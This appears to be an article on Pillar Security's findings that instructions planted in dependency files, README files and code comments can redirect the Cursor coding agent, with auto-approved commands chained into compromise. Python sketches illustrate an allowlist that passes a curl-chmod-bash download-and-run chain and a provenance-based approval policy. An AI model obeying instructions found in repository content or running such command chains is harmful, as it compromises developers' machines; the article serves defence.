The Agent Security Paradox: Trusted Commands in Cursor Become Attack Vectors

The paradox emerges from Cursor's design: the AI assistant gains its value by executing commands on behalf of developers. Users establish trust through repeated positive interactions, approving operations that prove beneficial. Attackers exploit this accumulated trust by planting malicious content in repositories, which then triggers harmful commands that appear consistent with established patterns.



Pillar Security demonstrated multiple attack vectors including malicious instructions embedded in dependency files that activate during package installation workflows, poisoned documentation that triggers dangerous operations when Cursor processes README files, and crafted code comments that redirect agent behavior during code review and refactoring tasks.

The research finds that Cursor's auto-approval mechanisms significantly amplify the risk. Once users enable automatic approval for common operations, attackers can chain these approved actions to achieve outcomes that no single approval would authorize. The cumulative effect of individually benign operations can be a severe compromise.
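The chaining problem can be illustrated with a minimal sketch. This is not Cursor's actual approval logic: the allowlist `AUTO_APPROVED`, the pattern `RISKY_CHAIN`, and both helper functions are hypothetical names chosen for illustration. The point is only that a per-command check can pass every step of a sequence whose combined effect is to download and run a script.

```python
# Hypothetical allowlist of programs a user has chosen to auto-approve.
# This is an assumption for illustration, not Cursor's real configuration.
AUTO_APPROVED = {"curl", "chmod", "bash", "npm"}

# Hypothetical risky pattern: download a file, make it executable, run it.
RISKY_CHAIN = ("curl", "chmod", "bash")


def is_auto_approved(command: str) -> bool:
    """Per-command check: approve if the program name is on the allowlist."""
    parts = command.split()
    return bool(parts) and parts[0] in AUTO_APPROVED


def chain_is_risky(commands: list[str]) -> bool:
    """Sequence check: True if the RISKY_CHAIN programs appear in order."""
    programs = iter(c.split()[0] for c in commands if c.split())
    # Membership tests on an iterator consume it, so each step must be
    # found after the previous one (an ordered-subsequence check).
    return all(step in programs for step in RISKY_CHAIN)


commands = [
    "curl -o /tmp/setup.sh https://example.invalid/setup.sh",
    "chmod +x /tmp/setup.sh",
    "bash /tmp/setup.sh",
]

# Every command passes the per-command check on its own...
print(all(is_auto_approved(c) for c in commands))
# ...but the sequence as a whole matches the risky pattern.
print(chain_is_risky(commands))
```

A check that looks only at one command at a time has no way to see the second result, which is why sequence-level analysis is a separate concern from allowlisting.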

Mitigation proves challenging because restricting Cursor's capabilities diminishes its core value proposition. Pillar Security recommends implementing context-aware approval that considers source provenance, establishing separate trust levels for internal versus external code, and developing anomaly detection for command sequences that deviate from typical developer workflows. Users should exercise particular caution when using AI assistants with unfamiliar repositories.
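One way to picture context-aware approval is a policy that looks at where a proposed command originated before deciding whether to run it. The sketch below is an assumption-laden illustration, not an API that Cursor or Pillar Security provides: `Provenance`, `Decision`, `ProposedCommand`, `LOW_RISK_PROGRAMS`, and `decide` are all hypothetical names, and a real system would also need a reliable way to attribute a command to its source.

```python
from dataclasses import dataclass
from enum import Enum


class Provenance(Enum):
    """Hypothetical labels for where the triggering content came from."""
    USER_PROMPT = "user_prompt"
    INTERNAL_REPO = "internal_repo"
    EXTERNAL_REPO = "external_repo"


class Decision(Enum):
    AUTO_APPROVE = "auto_approve"
    ASK_USER = "ask_user"


@dataclass(frozen=True)
class ProposedCommand:
    command: str
    provenance: Provenance


# Hypothetical set of programs considered low risk for trusted sources.
LOW_RISK_PROGRAMS = {"ls", "cat", "pwd"}


def decide(proposal: ProposedCommand) -> Decision:
    """Apply separate trust levels for internal versus external content."""
    parts = proposal.command.split()
    program = parts[0] if parts else ""

    # Anything prompted by external content always needs explicit approval,
    # even if the same command would be auto-approved elsewhere.
    if proposal.provenance is Provenance.EXTERNAL_REPO:
        return Decision.ASK_USER

    # Trusted sources may auto-run only low-risk programs.
    if program in LOW_RISK_PROGRAMS:
        return Decision.AUTO_APPROVE
    return Decision.ASK_USER


print(decide(ProposedCommand("ls -la", Provenance.INTERNAL_REPO)))
print(decide(ProposedCommand("ls -la", Provenance.EXTERNAL_REPO)))
```

The design choice here is that provenance is checked before the command itself, so content from an unfamiliar repository cannot inherit the trust a user has built up with their own code.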